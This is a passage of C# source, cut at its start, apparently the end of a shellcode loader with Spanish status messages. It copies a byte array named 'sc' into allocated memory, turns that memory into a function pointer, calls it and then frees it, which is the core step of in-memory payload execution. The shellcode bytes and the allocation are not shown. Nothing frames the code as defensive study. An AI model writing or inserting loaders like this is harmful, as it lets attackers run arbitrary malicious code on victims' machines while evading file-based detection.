System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota.");
Console.WriteLine("[+] Intentando cargar Shellcode");
try
{
Marshal.Copy(sc, 0, baseAddr, sc.Length);
ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
del();
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
finally
{
VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
}
}
}